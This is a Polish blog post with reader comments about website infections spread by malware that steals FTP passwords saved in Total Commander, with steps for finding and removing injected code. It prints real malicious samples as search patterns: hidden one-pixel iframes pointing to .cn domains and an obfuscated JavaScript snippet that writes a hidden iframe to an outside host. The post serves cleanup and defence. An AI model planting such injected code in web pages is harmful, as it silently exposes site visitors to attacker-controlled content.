nav-left cat-right
cat-right

Wirus na stronie internetowej (www)

WirusOstatnimi czasy coraz więcej klientów / ludzi “skarży” się na wirusy na swoich stronach internetowych – nie są to typowe “wirusy” a “po prostu” kawałek kodu źródłowego, który dopisuje się do plików index.php, index.html … itd

Pewnie zastanawia to Państwa jakim cudem się ten wirus dostał się na stronę?

Więc jest to powodem zawirusowanego systemu operacyjnego i zawartego hasła do serwera FTP w programie Total Commander, który niestety jest podatny na tego typu zabieg. Wirus sprawdza wszystkie konta FTP zapisane w programie i jeżeli ma możliwość zalogować się na daną stronę , loguje się a następnie wyszukuje typowe nazwy plików (np. index.php, index.html … ) i na końcu kodu dopisuje kilka linijek swojego kodu, który raz ma postać <iframe> a innym razem jako zaawansowany kawałek kodu JavaScript.

W wynikach wyszukiwania Google, często można znaleźć strony przy który jest napisane “Ta witryna może wyrządzić szkody na twoim komputerze” to oznacza, że dana strona właśnie posiada dopisany tego typu kod.

Jak usunąć tego wirusa?

  1. Po pierwsze i najważniejsze – od razu zmienić hasło do serwera FTP i nie zapisywać go w Total Commanderze (najlepiej go podawać podczas logowania, bądź po prostu skorzystać z innego oprogramowania, które jest wiele…)
  2. Zalogować się na serwer FTP i skopiować wszystkie pliki na swój lokalny dysk (komputer)
  3. Lokalnie na komputerze przeglądnąć wszystkie pliki poszukując kodu pokroju:

<iframe src=”http://mixante.cn/in.cgi?income55″ width=1 height=1 style=”visibility: hidden”></iframe>
<iframe src=”http://cheapslotplay.cn/in.cgi?income48″ width=1 height=1 style=”visibility: hidden”></iframe>
… itd

Zależność jest jedna – wyraz – “income” i w poszukiwaniu takiego wyrazu na początek zalecamy się skupić, gdy tylko znajdą Państwo tego typu kod, należy go usunąć i wgrać plik na serwer FTP nadpisując stary.

Drugim rodzajem “wirusa” może być kod podobny do:

<!– ad –><script>
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” “;
cvtot=”</”;
qtndm=”";
jlooz=3953;
uyimh=687;
qxcxg=4804;
ddytx=7948;
xkjpv=”write”;
mzsrv=”me”;
zqfqw=”et”;
gdtrk=”/’ st”;
rpiia=”yl”;
qxaol=”";
ldlvw=”i”;
zfhuu=”ty”;
hvkhb=”:h”;
hbqmm=”d”;
hauzn=”";
zdqdp=4;
sjgbi=”if”;
rpygo=”r”;
syjnh=” sr”;
rwanv=”c”;
elujl=”=”;
hrgnc=863;
akzpp=8853;
tplxn=” “;
cvtot=”</”;
qtndm=”";
jlooz=3953;
gftzo=(9.007e3>=5e1?uyimh:qxcxg);
jjaqh=(ddytx>.2438?xkjpv:3.);
gmbpt=(7.3e1>=36?mzsrv:.45);
zxtsi=(323,zqfqw+gdtrk+rpiia+”e=’”+”v”+”isib”);
hzpmf=(0×587,qxaol+ldlvw+”li”+zfhuu+hvkhb+”id”+hbqmm+”en”+”‘”+hauzn);
rmtyf=(6.5e1,”");

aaa=((567,gftzo),(0×2,document))[((0.3,2.46e2)>=(17,7918.)?(5249.>=0.8188?0x816:.5486)sad.gif.2717<=.77?jjaqh:0x14))](((zdqdp,2.),(0.591,”"+”<”+sjgbi+rpygo+”a”)+(82,gmbpt)+(0.1301,syjnh+rwanv+elujl+”‘”+”h”+”ttp”+”")+(8581.<.887?0.7:”://t”+”ruittbros.n”)+(476,zxtsi)+(hrgnc>=akzpp?9.909e3:hzpmf)+(69<38.?0.249:tplxn+”>”+cvtot+”if”+qtndm)+(2.>1.?”ram”+”e>”:64.)+(223.>=jlooz?1.:rmtyf)));</script><!– /ad –><!DOCTYPE html PUBLIC “-//W3C//DTD XHTML 1.0 Transitional//EN” “http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd”>

Proszę mieć na uwadze, że to w żadnym przypadku nie jest wina hostingu, obojętnie czy to będzie nazwa.pl, home.pl czy inna firma hostingowa (aczkolwiek istnieją skrajne przypadki…).

Po usunięciu w/w kodów i wgraniu ich na serwer FTP strona powinna być już odkażona :-)

W razie problemów (czy też braku umiejętności) z usunięciem wirusa, zapraszamy do kontaktu z nami.

Dodaj do:
  • Print
  • Google Bookmarks
  • Gwar
  • PDF
  • Twitter
  • Wykop

13 komentarzy »

  1. avatar
    przemoo napisał(a):
    nav-left

    mam dokładnie ten problem na kilku moich stronach, uzywalem total commandera i na prawie wszystkich jest wirus

    mam problem jak to usunąć, gdy chce ściagnac index.html albo index.php antywirus krzyczy ze to niebezpieczne i odrazu usuwa ten plik

    czy jest niebezpiecznym wylaczenie antywirusa na czas przeszukania kodu. czy ten kod moze zrobic cos nie tylko ze stroną www ale i z moim komputerem?

    nav-left
  2. avatar nav-left

    Na spokojnie możesz wyłączyć antywirusa na czas usuwania wirusa z pliku.

    Polecam Ci dodatkowo zmienić Total Commandera na innego klienta FTP.

    nav-left
  3. avatar
    przemoo napisał(a):
    nav-left

    zmienilem juz klienta ftp

    na stronach ktore mialem zrobione w html-u
    wystarczyla podmiana zdrowych plikow index.html i zmiana hasla ftp

    mam jednak problem ze zlokalizowaniem wirusa w cmsie extreme-fusion
    co mam zrobic?

    nav-left
  4. avatar nav-left

    Zobacz może w katalogu z template’ami

    nav-left
  5. avatar
    przemoo napisał(a):
    nav-left

    poradzilem sobie!
    w moim nowym kliencie ftp ustawilem kolejnosc pokazywania plików na ostatnio modyfikowane

    okazało sie ze ostatnio modyfikowane przeze mnie pliki były w modtfikowane na przełomie stycznia i lutego tymczasem zauwazylem ze ktos modyfikowal je w poznych porach nocnych i wczesno rannych pod koniec lipca
    zainteresowalo mnie to i zacząlem grzebac w kodzie (jezeli komus nie powiedzie sie sciagniecie zainfekowanego pliku prosze zmienic jego rozszerzenie z .html lub .php na .txt wtedy powinno pojsc gładko)
    okazało sie ze we wszystkich plikach w ktorych byla fraza index (a w cms-ie jest ich duzo,bo w poszczegolnych folderach jest chociaz jeden) był wsztrzykniety kod framein tzn taki jak pokazany jest powyzej tylko ze z jakiejs ruskiej domeny(BURRAKI!!!)
    usunalem ten kod, a troche tego bylo i gra gitara!! dla 15-latka to nie lada sukces!

    nav-left
  6. avatar nav-left

    Wymień klienta FTP z TC na FileZille. Na czas usuwania kodu z pliku index możesz wyłączyć program antywirusowy. Jeśli dostałeś filtr od google to strona powinna wrócić na swoje miejsce po ponownym przeindeksowaniu jeśli jest “czysta” – jeśli nie wraca napisz do google prośbę o przywrócenie strony.

    nav-left
  7. avatar
    marcinelli napisał(a):
    nav-left

    Witam,
    a czy jest możliwe, że takowy wirus zmieni jakoś hasło do użytkownika ftp?

    nav-left
  8. avatar nav-left

    Witaj,

    Jest to raczej nie możliwe, gdyż wszystkie dane do konta ftp. są zapisane i chronione przez firmę hostingową.

    nav-left
  9. avatar
    michal napisał(a):
    nav-left

    Witam, posiadam stronę na której antywirus (Avats, Nod) wykrywają wirusa. Wyświetla komunikat:
    Obiekt:

    http://nazwa-strony.pl/templates/nazwa-szablonu/css/js/addons...

    Zagrożenie: HTML/iframe/C.Gen.wirus

    Informacje: połączenie zakończone -poddany kwarantanie.

    Wszystko ładnie piękne ale nie mogę znaleźć żadnego pliku pod nazwą “addons…”

    Co robić ?

    nav-left
  10. avatar
    michal napisał(a):
    nav-left

    Witam, mam problem nie wiem jak poradzić sobie z tym wirusem. Używam filezille.
    Antywirus (Nod) wyświetla komunikat że w folderze templates -> css – > js i plik addons… jest wirus iframe. Pliku addons nie mogę nigdzie znaleźć. Pomóżcie :)

    nav-left
  11. avatar nav-left

    Przeszukaj folder z templatką

    nav-left
  12. avatar
    Maria napisał(a):
    nav-left

    Mam podobny problem. Ludzie mówią mi, że na stronach pisanych przeze mnie są wirusy, ale mój antywirus (avira) nic nie melduje. Nie wiem, jakich programów używają, ani jakie komunikaty im się pokazują. Google nic nie zaznacza przy wyszukiwaniu stron. Czy możliwe, że antywirus się myli – jak sprawdzić: mój czy innych? Przejrzałam kilka plików .index.php, index. html, ale nie znalazłam dopisanego kodu. Co mam robić? Proszę o pomoc.

    nav-left
  13. avatar nav-left

    mój antyvir “avira” ostrzega mnie przed wirusem na moje stronie http://www.litwin.freehost.pl/galeria/galeria.htm , okazało się , ze doklejany tam jest kod iframe, po próbach wczytywania na serwer nowej strony itd. spróbowąłem wrzucić cała nową czysta stronę pod inny adres tej samej firmy hostingowej
    http://www.litwin.piwko.pl/galeria/galeria.htm
    wirus również został doklejony
    jednak po wrzuceniu strony na serwer innej darmowej firmy strona jest czysta :
    http://www.fotobiznes.yoyo.pl/galeria/galeria.htm

    w korespondencji z firmą freehost otrzyamłem odpowiedź , ze za darmowy serwer oni nie odpowiadają…
    takwiec niestety jest to wina hostingu.

    nav-left

Zostaw komentarz

Security Code: